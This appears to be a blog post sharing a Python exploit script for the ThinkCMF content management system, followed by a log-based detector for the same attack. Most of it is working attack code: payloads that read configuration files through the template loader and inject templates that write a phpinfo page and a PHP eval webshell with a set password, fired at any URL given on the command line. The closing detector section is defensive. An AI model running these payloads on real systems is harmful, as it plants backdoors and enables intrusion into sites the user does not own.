A simple ThinkCMF exp script

This is a simple ThinkCMF exp. The code itself only needs the requests library, but for a better user experience it also uses argparse to provide a friendly command-line interface. Below are the payloads the script probes and how it is used.

It probes the following four payloads:

```
?a=display&templateFile=README.md
?a=display&templateFile=config.yaml
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>
```

The first two mainly check whether the site has the file read vulnerability; the last two are file writes, testing a phpinfo page and a PHP one-liner webshell respectively.

The code is written in Python 3 and is extremely simple.

For now only single-URL checking is implemented; there is no plan to add batch scanning. The main options are -u/--url and -h/--help.

```python
# Author: zjun
# Github: https://github.com/bestreder
# Date: 2020-02-10

import requests
import argparse
from requests.exceptions import RequestException

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'
}

# Every payload function returns 0 = vulnerable, 1 = not found, 2 = request failed / timed out.

def payload_01(url):
    # Arbitrary file read: fetch README.md through the template loader.
    try:
        response = requests.get(url + '?a=display&templateFile=README.md', headers=headers, timeout=5)
        if '## README' in response.text:
            print('[+]存在readme.md: {}?a=display&templateFile=README.md'.format(url))
            return 0
        return 1
    except RequestException:
        return 2

def payload_02(url):
    # Arbitrary file read: fetch config.yaml through the template loader.
    try:
        response = requests.get(url + '?a=display&templateFile=config.yaml', headers=headers, timeout=5)
        if 'name: thinkcmf' in response.text:
            print('[+]存在config.yaml: {}?a=display&templateFile=config.yaml'.format(url))
            return 0
        return 1
    except RequestException:
        return 2

def payload_03(url):
    # File write: inject a template that writes test.php (phpinfo), then fetch it.
    try:
        response = requests.get(
            url + "?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>",
            headers=headers, timeout=5)
        if response.status_code == 200:
            response = requests.get(url + '/test.php', headers=headers, timeout=5)
            if response.status_code == 200 and 'http://www.php.net' in response.text:
                print('[+]phpinfo: {}/test.php'.format(url))
                return 0
        return 1
    except RequestException:
        return 2

def payload_04(url):
    # File write: inject a template that writes red.php (one-liner), then fetch it.
    try:
        response = requests.get(
            url + '''?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>''',
            headers=headers, allow_redirects=False, timeout=5)
        if response.status_code == 200:
            response = requests.get(url + '/red.php', headers=headers, allow_redirects=False, timeout=5)
            if 'by:zjun' in response.text:
                print('[+]请连接shell,密码是red: {}/red.php'.format(url))
                return 0
        return 1
    except RequestException:
        return 2

if __name__ == '__main__':
    print(r'''
_ _ _ _ __
| |_| |__ (_)_ __ | | _____ _ __ ___ / _| _____ ___ __
| __| '_ \| | '_ \| |/ / __| '_ ` _ \| |_ _____ / _ \ \/ / '_ \
| |_| | | | | | | | < (__| | | | | | _|_____| __/> <| |_) |
\__|_| |_|_|_| |_|_|\_\___|_| |_| |_|_| \___/_/\_\ .__/
|_|
-by:zjun
www.zjun.info
该脚本具有一定误差,请谨慎使用,仅供参考!
''')
    parser = argparse.ArgumentParser(description='The exp of thinkcmf')
    parser.add_argument('-u', '--url', required=True, help='target url')
    args = parser.parse_args()
    url = args.url
    # Collect the four results instead of shadowing the function names with their return values.
    results = [payload_01(url), payload_02(url), payload_03(url), payload_04(url)]
    # The original `a and b and c and d == 2` only compared the last result; compare all of them.
    if all(r == 2 for r in results):
        print('[-]连接超时:{}'.format(url))
    elif 0 not in results:
        print('[-]初步测试暂不存在thinkcmf漏洞: {}'.format(url))
    else:
        print('^ _ ^ enjoy it!')
```
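From the defender's side, the four probes above leave a very recognisable trace in the web server access log: `a=display` with a `templateFile` pointing at a non-template file, and `a=fetch` with a `content` parameter carrying `<php>` or `file_put_contents`. The following detector, added here as an example and not part of zjun's script, parses combined-format log lines (constructed sample data, not real traffic) and flags both patterns; the `NON_TEMPLATE_EXT` list is an assumption about what a legitimate template name never ends in.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2020:12:00:01 +0800] "GET /?a=display&templateFile=README.md HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Feb/2020:12:00:02 +0800] "GET /?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('t.php','%3C?php%20phpinfo();?%3E')%3C/php%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2020:12:00:03 +0800] "GET /portal/index.php?a=index HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2020:12:00:04 +0800] "GET /?a=display&templateFile=../../data/conf/config.yaml HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Assumed list of extensions a legitimate templateFile= should never point at.
NON_TEMPLATE_EXT = {'md', 'yaml', 'yml', 'php', 'env', 'ini', 'txt', 'sql', 'log'}

def classify_request(target):
    """Label a request target matching the ThinkCMF template-injection patterns, else None."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # parse_qs already decodes once; unquote again so double-encoded payloads are still seen.
    params = {k.lower(): unquote(v[0]) for k, v in qs.items()}
    action = params.get('a', '').lower()
    tpl = params.get('templatefile', '')
    content = params.get('content', '').lower()
    if action == 'fetch' and any(m in content for m in ('<php>', '<?php', 'file_put_contents')):
        return 'fetch: template injection / file write attempt'
    if action == 'display' and tpl:
        ext = tpl.rsplit('.', 1)[-1].lower() if '.' in tpl else ''
        if '..' in tpl or ext in NON_TEMPLATE_EXT:
            return 'display: arbitrary file read attempt'
    return None

def scan_log(text):
    """Return (ip, timestamp, target, label) for every suspicious line in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m['target'])
        if label:
            hits.append((m['ip'], m['ts'], m['target'], label))
    return hits

if __name__ == '__main__':
    for ip, ts, target, label in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip} {label}: {target}')
```

A 200 response to the `fetch` request followed by a GET of a new `.php` file from the same client is the second signal to correlate on; the status field is captured by `LOG_RE` for that purpose.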

Project repository
